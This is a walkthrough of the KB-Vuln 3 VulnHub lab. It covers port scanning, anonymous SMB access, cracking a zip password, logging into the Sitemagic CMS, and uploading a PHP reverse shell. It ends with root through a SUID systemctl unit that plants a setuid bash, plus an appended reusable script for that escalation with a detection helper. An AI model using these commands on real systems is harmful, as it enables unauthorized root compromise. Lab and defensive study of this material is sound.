KB-Vuln 3 vulnhub writeup

Oline77
3 min readNov 24, 2020

I started by scanning the target machine for open ports and the services running on them with Nmap (all 65535 TCP ports, with version detection and default scripts):

nmap -p- -A <IP>

We have an Apache server running on port 80, so let’s run gobuster against it:

gobuster dir --url http://<IP>/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,php,txt,html -t 100

Nothing found.

Let’s see what the Samba shares expose without a password (anonymous/null session):

smbclient -N -L <IP>

There is a Files share. Connect to it (press Enter at the password prompt) and list its contents:

smbclient -N //<IP>/Files

Download the file from the smb: prompt with get website.zip. The archive is password protected, so let’s crack it with fcrackzip in dictionary mode using rockyou.txt (-u makes fcrackzip verify each candidate with unzip, which filters out false positives):

fcrackzip -D -p /home/kali/Documents/rockyou.txt -u website.zip

Works!

README.txt inside the archive gives us the credentials admin / jesse for the website kb.vuln. The site is served by name, so add kb.vuln to /etc/hosts (sudo nano /etc/hosts) with a line like:

<IP> kb.vuln

Go to http://kb.vuln/: it’s a Sitemagic CMS installation. Log in as admin:jesse.

Start a listener on the attacking machine, then upload a PHP reverse shell through the CMS file manager:

Browse to the uploaded file (refresh the page) to trigger it and get a shell as www-data:

Location of our script
Works!

The reverse shell is not a proper TTY. Use the following command to spawn a fully interactive shell:

/usr/bin/script -qc /bin/bash /dev/null

cat user.txt in the user’s home directory gives the first flag:

The flag is an MD5 hash; it equals md5(mr.write).

Now it’s time for privilege escalation. Use the following command to search for SUID binaries (the bit is shown as an s in the permissions column):

find / -type f -perm /4000 -ls 2>/dev/null

There is a very interesting one: /bin/systemctl. systemctl is used to examine and control the state of the systemd system and service manager. Because it runs as root (setuid), an unprivileged user can link and start an arbitrary unit file, and systemd then executes that unit’s ExecStart as root. Look the binary up in a SUID-abuse reference such as GTFOBins, and try to understand how the trick works before running it. We found an interesting one, let’s apply it:

On our www-data shell, write a oneshot unit whose ExecStart copies bash into the web root and sets the setuid/setgid bits on the copy:

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /var/www/html/sitemagic/ && chmod +s /var/www/html/sitemagic/bash"
[Install]
WantedBy=multi-user.target' > /var/www/html/sitemagic/shell.service

Let’s link our shell.service into systemd (link needs an absolute path), enable and start it right away, then move to the directory where the setuid bash was dropped:

systemctl link /var/www/html/sitemagic/shell.service
systemctl enable --now /var/www/html/sitemagic/shell.service
cd /var/www/html/sitemagic/

And run it with -p, which tells bash to keep the effective uid instead of dropping back to www-data:

./bash -p

Root!

cd /root

…well done
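The following script is an added example and not part of the original writeup. It wraps the SUID systemctl escalation above in shell functions that check their preconditions (systemctl really is setuid, the unit file was written) and adds the check a defender would run afterwards: unit symlinks in /etc/systemd/system that point outside the systemd directories, which is exactly what systemctl link leaves behind. The drop directory, the unit name shell.service and the --exploit flag are assumptions chosen for the example; the unit contents mirror the writeup.

```shell
#!/bin/sh
# Added example (not from the original writeup). Helper functions around the
# SUID systemctl privilege escalation, plus a defender-side audit.
# Assumed: the drop directory is writable by the low-privileged user and
# lives on a filesystem that is not mounted nosuid.

# List regular files with the setuid bit under $1 (the writeup's find,
# rooted at a directory so it can be run on any tree).
suid_files() {
    find "$1" -type f -perm -4000 2>/dev/null || true
}

# Succeed if $1 carries the setuid bit (POSIX test -u).
is_suid() {
    [ -u "$1" ]
}

# Write a oneshot unit to $1 that copies bash into $2 and marks it setuid.
# systemd runs ExecStart as root, which is what plants the privileged copy.
write_unit() {
    unit_path=$1
    drop_dir=$2
    cat > "$unit_path" <<EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash $drop_dir/ && chmod +s $drop_dir/bash"
[Install]
WantedBy=multi-user.target
EOF
}

# Run the escalation, refusing early if systemctl is not actually setuid.
exploit() {
    drop_dir=$1
    if ! is_suid /bin/systemctl; then
        echo "/bin/systemctl is not setuid; this technique does not apply" >&2
        return 1
    fi
    write_unit "$drop_dir/shell.service" "$drop_dir"
    # link requires an absolute path; enable --now starts the unit immediately
    systemctl link "$drop_dir/shell.service"
    systemctl enable --now "$drop_dir/shell.service"
    # -p keeps the effective uid; without it bash drops back to the real uid
    "$drop_dir/bash" -p
}

# Defender check: *.service symlinks in the unit directory $1 (normally
# /etc/systemd/system) whose target lies outside the systemd directories.
# systemctl link creates precisely such a symlink.
foreign_linked_units() {
    unit_dir=$1
    for f in "$unit_dir"/*.service; do
        [ -L "$f" ] || continue
        target=$(readlink "$f")
        case $target in
            /etc/systemd/*|/usr/lib/systemd/*|/lib/systemd/*) ;;
            *) echo "$f -> $target" ;;
        esac
    done
}

# Only attempt the escalation when explicitly asked; sourcing or running the
# file without arguments just defines the functions.
if [ "${1:-}" = "--exploit" ]; then
    exploit "${2:-/var/www/html/sitemagic}"
fi
```

Run sh suid_systemctl.sh --exploit /var/www/html/sitemagic on the target to reproduce the writeup’s steps; run foreign_linked_units /etc/systemd/system as root on a suspect host to find units that were linked in from places like a web root.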
